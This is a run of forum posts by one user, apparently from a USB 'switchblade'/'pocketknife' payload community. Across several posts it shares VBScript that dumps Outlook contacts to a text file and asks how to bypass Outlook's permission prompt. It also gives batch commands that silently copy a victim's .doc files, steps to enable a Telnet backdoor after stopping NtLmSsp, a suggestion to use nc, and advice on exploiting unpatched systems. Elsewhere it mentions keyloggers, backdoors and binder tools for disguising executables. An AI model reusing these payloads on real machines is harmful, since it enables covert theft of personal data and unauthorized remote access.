DMilton

May be this was a fool question? No one have tried it? Any other way to extract the contents of the contacts lists to a file? Any suggestion?

We have to appoint DingleBerries the official digger!

I think the project must be continued and If alexthedrifter carries the torch I'll be glad of helping a bit with cleaning code, digging for some other interesting things and with other community contributions or ideas. But it must be in other post and I have a further question, is anybody else interested in working on it?

Hahahahaha! In your case, the answer of the topic would be: How many icons can room you?

I agree that in forensic works, the last you want to see is nothing, there's no sense in hidding the cmd box. This payload was made by Tcstool originaly in forensis works, I agree it can be used for other purposes as grabbing sensible info from a pc, but... I saw the white papper an the info looks great! You can extract not only the serial number of all attached USB, but the last date it was connected and more... For forensic matters I think is a great implementation. If you want some help in this, I'll be ready on trying to do my best with it.

I think we can improve the payload a bit more... But I'll wait for Leapo's taking the torch a few time more. Theese days are complicated for someone that is studiying... If he pass the torch, I'll be very glad to continue it with some of the community support. If he doesn't, I'll be very glad to help in the progress and improve of it. Both cases, this project will continue....

I can't believe it! There's about 2 Tons and a half of icons in my 3 desktops, the most of them are simply txt files with very long names... It's time to clean it a bit, If you want to help me, no worry...

You can learn and read by typing (for example) BINDER JOINER HACK into google. As far as I know, you can do it something like this but it results in executing an exe and launching an jpg instead reverse. But if the program you want to call is a virus or if it's virus detectable, it'll be detected anyway.

Switchblade Wiki works for me! Try again...

Wow!! I get mine 8Gb per 16€ at Media Market!

All U3 drives work for U3 Hacking, Sandisk, Memorex, etc... :EDIT I found my new U3 Sandisk 8Gb a week ago but It took some searching work... Ebay is a good option for it.

You can enable the Windows Scripting Host too by executing the noscript.exe But there's one thing I don't understand... The WSH doesn't affect running of batches

:P You doesn't need to define the variables twice, if you CALL ANOTHERBATCH.BAT from yourbatch.bat, the variables given by the vbs will work perfectly. It's because when you're calling a batch program from other, all the defined variables exists. But if you deffinitely want not to use a vbs launcher to give the variables to the batch, you can aply the batching way I show you to format the date and time.

You must have a proof system with all updates available installed. Then see the differences between your updates and the updates extracted from the victim's pc, then you can exploit the non-installed patches as alexthedrifter says... googleing.

You can use the same vbs with each batch file you need to. There's two ways to do it, one is by executing one instance of the vbs per file... See strPath = "YOURBATCH.BAT" objShell.Run strPath, 1, False The run command doesn't control the results of the running app, in this case, YOURBATCH.BAT. But if you are attempting to run more batches in a time, you can add each batch from the same script and control their execution by managing the boolean value of the run method, with "True" the program will wait until the finishing of the batch, and with "False" it doesn't wait for finish of the batch, then the program will continue with next line of code. Example: Prog1 = "YOURBATCH.BAT" 'This is in the same folder as the vbs Prog2 = "C:\Windows\hiddenbatch.bat" 'For a batch in other folder Prog3 = "%SYSTEMROOT%\SYSTEM32\my_personal_trojan.exe 'Using environment variables objShell.Run Prog1, 1, False ' The batch "yourbatch.bat" is executed in a minimized way and the program doesn't wait objShell.Run Prog2, 1, True ' The batch "hiddenbatch.bat" is executed and the program wait for the finishing of it objShell.Run Prog3, 1, False In all the yourbatch.bat, hiddenbatch.bat or my_personal_trojan.exe, the Date and Time variables can be called from the batch. If you want to know more on this stuff, see Microsoft Windows 2000 Scripting Guide For the subject of this post, see This <_< But if you want, you can format dates in a batch way... If you use in your batch some like this in an formated date as DD/MM/YYYY: set DateToFile=%date:~6,4%-%date:~3,2%-%date:~0,2% \stext %computername%[%DateToFile%].txt As see, you can use %DateToFile% variable for using in your program, it will gives the Date formatted to YYY-MM-DD... Now you can play with it to do the same with the %TIME% system enviroment variable or simply use SET /? from command line to see examples on how using variables and how deffining them. ;)

It's not a new or brilliant idea, but I've been working a bit in extracting the contacts list from outlook address book. This implementation made simply to any payload, would be able to extract the contact list to a plain text file. Set fso = CreateObject("Scripting.FileSystemObject") set outlook=WScript.CreateObject("Outlook.Application") if Not err=0 then msgbox "Outlook is not available." else set mapi=outlook.GetNameSpace("MAPI") set MSOfile=fso.CreateTextFile("outlook-contacts.txt") for ctrentries=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrentries) x=1 for countEntries=1 to n.AddressEntries.Count contact=n.AddressEntries(x) MSOfile.WriteLine contact x=x+1 next next end if Of course, the err check is only for testing purposes. ;) The problem is the message box of (almost for Outlook 2003) asking for permission for reading the contents of the pst file. Any ideas on how to bypass the message box, some fix to the code or idea?

See for the code in line 1 of the vbs: Set objShell = CreateObject("Wscript.Shell" must be (also edited in previous post): Set objShell = CreateObject("Wscript.Shell") I have tested it and works ok (almost in WXP) If you get the variables, you can do whatever you want with them, calling them, batching them, etc. A proof of concept on how it works (maybe for your mkdir it can be usefull, I have batched the next. Called yourbatch.bat (place it in the same folder as vbs), executethe vbs and it will call the yourbatch.bat file that will create a plain txt containing the results of vars given. Also it creates a new folder with the mentioned structure. ::yourbatch.bat echo off echo PROOF OF CONCEPT &gt;proofdatetime.txt echo var Date: %Date% &gt;&gt;proofdatetime.txt echo var Time: %Time% &gt;&gt;proofdatetime.txt echo mkdirectory: %computername%[%Date%-%Time%].txt&gt;&gt;pruebadate.txt mkdir %computername%[%Date%-%Time%] You can do what you want with the variables. But I think the problem was solved with the mentioned code change.

Pocket knife extracts a list of updates of the system, you can test them at home and search for any vulnerability.

I think it's a good idea too. Do you know why it hangs up? What kind of systems it hangs up? If you want us to have a look to the piece of the VBScript, there'll be a good way to debug it by posting it or PM it, as you like.

There's no mistake. It's a piece from pocketknife and the only you have to do is defining the path you want to copy the files to. Previous to creating the path %computername%\Slurp_Data\Desktop, you must create the ..\..\Documents folder, the \logfiles folder, the %computername% folder, the Slurp_Data folder... Use one mkdir for each folder... mkdir ..\..\Documents mkdir ..\..\Documents\logfiles mkdir ..\..\Documents\logfiles\%computername% mkdir ..\..\Documents\logfiles\%computername%\Slurp_Data mkdir ..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop xcopy "C:\*.doc" "..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop\" /s /c /q /r /h /y

You can search from specific type of files. The task is undetectable and you can find the solution reading the forum... Not only able to do it in one/two directories... You can search from the entire hdd. nircmd is not needed (also you can use it), you can program it to make the work invisible, it not depends on what white/grey/black hat you do, but the way you program it and use it.

It depends on what do you want to do with your payload... Amish and switchblade are both into Leapo's pocketnife. The better you can do is reading all the posts (pinned and newests) and look for the features you want. Or better, you can modify the batches to do what you want. Reading is the better solution. There's a lot of payloads you can execute from a non-U3.

As ever, I must to say it... If you use an alternative installation language, you will get an error when trying to get "%ALLUSERSPROFILE%\Start Menu". But if you answer the registry key for it into HKEY_CLASSES_ROOT\CLSID\{4622AD11-FF23-11d0-8D34-00A0C90F2719} key value, you will find the exact and correct name of the "Start Menu" folder. By example, as all of you know, I'm spanish and if I try to go to "%ALLUSERSPROFILE%\Start Menu" surely I'll can't because my Start Menu is named "Menú Inicio"... It's possible to get in a variable the key of the Start Menú by using a variation of the reliable paths method described by me in the wiki... Or simply using vbs, of course! Take a look if you want!

Then I will be testing the reason of not running almost it is in a desktop folder. The code seems to be ok, but... Hummm.... :Edit Issues with Telnet: By the way, there's some problems with the Telnet Service. The TlntSvr doesn't start with sc config TlntSvr start= boot but with sc config TlntSvr start= auto In other hand, Telnet Service is disabled with XP SP2 and we can launch it but is not available in XP Home. Then we must to check what OS we have to do the task or creating the entire service to use correctly (can do it by vbs). Another thing to check for assure the service start is that TlntSvr is installed in the machine. For doing so, we can check for the correct branch in reg (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr) and operate accordingly with adding the service or not. It only will take a few lines to check it and if is not installed, we can add easily the needed keys to the registry with the batch or the vbs to operate the Service correctly. Before of enabling the Telnet Service, I think is better option to stop the NtLmSsp Service (NT LM Security Support Provider) before enabling telnet. net stop NtLmSsp The final code would be... tlntsvr /service net stop NtLmSsp sc config TlntSvr start= auto But definitively, Telnet has problems in Windows XPSP2... What about using nc?

I feel you didn't understand me (sorry, probabily it's my poor english). The question was if the payload.exe is a compilation of all the needed files (included keylogger and backdoor) or if payload.exe needs the batches, the 1.vbs and the other exes to go?